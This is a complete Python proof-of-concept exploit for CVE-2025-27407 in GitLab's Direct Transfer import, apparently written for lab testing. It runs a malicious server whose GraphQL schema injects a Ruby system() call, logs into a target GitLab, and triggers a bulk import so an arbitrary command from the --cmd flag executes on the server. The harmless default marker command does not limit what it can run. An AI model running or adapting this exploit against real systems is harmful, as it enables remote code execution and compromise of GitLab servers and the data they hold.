#!/usr/bin/env python3 import argparse import html import http.cookiejar import json import re import shlex import threading import time import urllib.parse import urllib.request from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer DEFAULT_CMD = "touch /tmp/cve_2025_27407_gitlab_marker" def log(message): print(message, flush=True) def scalar_field(name, scalar): return { "name": name, "description": None, "args": [], "type": {"kind": "SCALAR", "name": scalar, "ofType": None}, "isDeprecated": False, "deprecationReason": None, } def malicious_schema(command): payload_name = f"safe\nend\nsystem({command!r})\ndef safe2" return { "data": { "__schema": { "queryType": {"name": "Query"}, "mutationType": None, "subscriptionType": None, "types": [ { "kind": "OBJECT", "name": "Query", "description": None, "fields": [ { "name": "group", "description": None, "args": [ { "name": "fullPath", "description": None, "type": {"kind": "SCALAR", "name": "ID", "ofType": None}, "defaultValue": None, } ], "type": {"kind": "OBJECT", "name": "Group", "ofType": None}, "isDeprecated": False, "deprecationReason": None, } ], "interfaces": [], }, { "kind": "OBJECT", "name": "Group", "description": None, "fields": [ scalar_field("id", "ID"), scalar_field("name", "String"), scalar_field("path", "String"), scalar_field("description", "String"), scalar_field("visibility", "String"), scalar_field("emailsDisabled", "Boolean"), scalar_field("lfsEnabled", "Boolean"), scalar_field("mentionsDisabled", "Boolean"), scalar_field("projectCreationLevel", "String"), scalar_field("requestAccessEnabled", "Boolean"), scalar_field("requireTwoFactorAuthentication", "Boolean"), scalar_field("shareWithGroupLock", "Boolean"), scalar_field("subgroupCreationLevel", "String"), scalar_field("twoFactorGracePeriod", "Int"), ], "interfaces": [], }, { "kind": "INPUT_OBJECT", "name": "ExploitInput", "description": None, "inputFields": [ { "name": payload_name, "description": None, "type": {"kind": "SCALAR", "name": "String", "ofType": None}, "defaultValue": None, } ], }, ], "directives": [], } } } class EvilSourceHandler(BaseHTTPRequestHandler): payload_command = DEFAULT_CMD events = [] saw_introspection = threading.Event() def send_json(self, status, body): data = json.dumps(body).encode() self.send_response(status) self.send_header("Content-Type", "application/json") self.send_header("Content-Length", str(len(data))) self.end_headers() self.wfile.write(data) def event(self, message): EvilSourceHandler.events.append(message) log(f"[evil-source] {message}") def do_GET(self): path = self.path.split("?", 1)[0] if path in ("/api/v4/version", "/api/v4/metadata"): self.event(f"GET {path}") self.send_json(200, {"version": "16.11.8", "revision": "cve-2025-27407-lab", "enterprise": False}) elif path == "/api/v4/personal_access_tokens/self": self.event(f"GET {path}") self.send_json(200, {"id": 1, "name": "lab-token", "scopes": ["api"], "active": True}) elif path.endswith("/export_relations/status"): self.event(f"GET {path}") self.send_json(200, {"relations": []}) else: self.event(f"GET {path} -> 404") self.send_json(404, {"message": "not found"}) def do_POST(self): path = self.path.split("?", 1)[0] length = int(self.headers.get("Content-Length", "0")) body = self.rfile.read(length).decode(errors="replace") if path == "/api/graphql": if "__schema" in body or "IntrospectionQuery" in body: EvilSourceHandler.saw_introspection.set() self.event(f"POST /api/graphql introspection -> malicious schema; command={self.payload_command!r}") self.send_json(200, malicious_schema(self.payload_command)) else: self.event("POST /api/graphql normal query") self.send_json( 200, { "data": { "group": { "id": "gid://gitlab/Group/1", "name": "evilgroup", "path": "evilgroup", "description": "lab group", "visibility": "private", "emailsDisabled": False, "lfsEnabled": True, "mentionsDisabled": False, "projectCreationLevel": "developer", "requestAccessEnabled": False, "requireTwoFactorAuthentication": False, "shareWithGroupLock": False, "subgroupCreationLevel": "owner", "twoFactorGracePeriod": 48, } } }, ) elif path.endswith("/export_relations"): self.event(f"POST {path} -> 404") self.send_json(404, {"message": "export intentionally not implemented"}) else: self.event(f"POST {path} -> 404") self.send_json(404, {"message": "not found"}) def log_message(self, _format, *_args): return def start_evil_source(listen_host, listen_port, command): EvilSourceHandler.payload_command = command EvilSourceHandler.events = [] EvilSourceHandler.saw_introspection.clear() server = ThreadingHTTPServer((listen_host, listen_port), EvilSourceHandler) thread = threading.Thread(target=server.serve_forever, daemon=True) thread.start() log(f"[*] evil source listening on {listen_host}:{listen_port}") return server def wait_for_introspection(timeout_seconds): log(f"[*] keeping evil source alive for up to {timeout_seconds}s while GitLab workers run") deadline = time.time() + timeout_seconds while time.time() < deadline: if EvilSourceHandler.saw_introspection.wait(timeout=1): log("[+] GitLab reached /api/graphql introspection over HTTP") return True log("[-] timed out waiting for /api/graphql introspection") return False class GitLabSession: def __init__(self, base_url): self.base_url = base_url.rstrip("/") jar = http.cookiejar.CookieJar() self.http = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar)) def request(self, method, path, data=None, headers=None, json_body=False, allow_http_error=False): url = path if path.startswith("http") else self.base_url + path request_headers = {"User-Agent": "cve-2025-27407-host-port-cmd-poc"} if headers: request_headers.update(headers) body = None if data is not None: if json_body: body = json.dumps(data).encode() request_headers["Content-Type"] = "application/json" else: body = urllib.parse.urlencode(data, doseq=True).encode() request_headers["Content-Type"] = "application/x-www-form-urlencoded" request = urllib.request.Request(url, data=body, method=method, headers=request_headers) try: response = self.http.open(request, timeout=90) return response.status, response.geturl(), response.headers, response.read().decode(errors="replace") except urllib.error.HTTPError as exc: if not allow_http_error: raise return exc.code, exc.geturl(), exc.headers, exc.read().decode(errors="replace") def csrf_from(body): patterns = [ r'name="csrf-token"\s+content="([^"]+)"', r'content="([^"]+)"\s+name="csrf-token"', r'name="authenticity_token"\s+value="([^"]+)"', ] for pattern in patterns: match = re.search(pattern, body) if match: return html.unescape(match.group(1)) raise RuntimeError("could not find CSRF token") def trigger_import(gitlab, source_url, username, password): status, _, _, body = gitlab.request("GET", "/users/sign_in") log(f"[*] sign-in page status={status}") csrf = csrf_from(body) status, url, _, body = gitlab.request( "POST", "/users/sign_in", { "authenticity_token": csrf, "user[login]": username, "user[password]": password, "user[remember_me]": "0", }, {"Referer": f"{gitlab.base_url}/users/sign_in"}, allow_http_error=True, ) log(f"[*] login status={status} final_url={url}") if "users/sign_in" in url and status != 200: raise RuntimeError("login failed") csrf = csrf_from(body) status, url, _, body = gitlab.request( "POST", "/import/bulk_imports/configure", { "authenticity_token": csrf, "bulk_import_gitlab_url": source_url, "bulk_import_gitlab_access_token": "fake-api-token-with-api-scope", }, {"Referer": f"{gitlab.base_url}/import/bulk_imports/status"}, allow_http_error=True, ) log(f"[*] configure status={status} final_url={url}") if status >= 400: raise RuntimeError(f"configure failed: {body[:500]}") status, _, _, body = gitlab.request("GET", "/") csrf = csrf_from(body) destination_name = f"evilgroup-copy-{int(time.time())}" status, url, _, body = gitlab.request( "POST", "/import/bulk_imports", { "bulk_import": [ { "source_type": "group_entity", "source_full_path": "evilgroup", "destination_name": destination_name, "destination_namespace": "", "migrate_projects": False, "migrate_memberships": False, } ] }, { "Referer": f"{gitlab.base_url}/import/bulk_imports/status", "X-CSRF-Token": csrf, "Accept": "application/json", }, json_body=True, allow_http_error=True, ) log(f"[*] create/import trigger status={status} final_url={url}") log(body[:2000]) return status def main(): parser = argparse.ArgumentParser(description="CVE-2025-27407 GitLab Direct Transfer PoC for local authorized lab use") parser.add_argument("--host", required=True, help="GitLab host, e.g. 127.0.0.1") parser.add_argument("--port", type=int, required=True, help="GitLab HTTP port, e.g. 18080") parser.add_argument("--cmd", default=DEFAULT_CMD, help=f"Command to run in GitLab runtime, default: {DEFAULT_CMD!r}") parser.add_argument("--scheme", default="http", choices=("http", "https"), help="GitLab scheme") parser.add_argument("--username", default="root", help="GitLab username") parser.add_argument("--password", default="Cve27407Password!", help="GitLab password") parser.add_argument("--listen-host", default="0.0.0.0", help="Evil source bind host") parser.add_argument("--listen-port", type=int, default=8001, help="Evil source bind port") parser.add_argument("--wait-seconds", type=int, default=90, help="How long to keep the evil source alive after triggering import") parser.add_argument( "--source-url", default=None, help="URL GitLab should use to reach evil source; default uses host.containers.internal with --listen-port", ) args = parser.parse_args() source_url = args.source_url or f"http://host.containers.internal:{args.listen_port}" gitlab_url = f"{args.scheme}://{args.host}:{args.port}" log(f"[*] target GitLab: {gitlab_url}") log(f"[*] source URL as seen by GitLab: {source_url}") log(f"[*] test command: {args.cmd!r}") log(f"[*] shell-safe display: {shlex.join(['sh', '-lc', args.cmd])}") server = start_evil_source(args.listen_host, args.listen_port, args.cmd) try: trigger_import(GitLabSession(gitlab_url), source_url, args.username, args.password) wait_for_introspection(args.wait_seconds) log("[*] trigger sent; verify the command side effect on the GitLab runtime") if EvilSourceHandler.events: log("[*] evil source observed requests:") for event in EvilSourceHandler.events[-20:]: log(f" {event}") finally: server.shutdown() if __name__ == "__main__": main()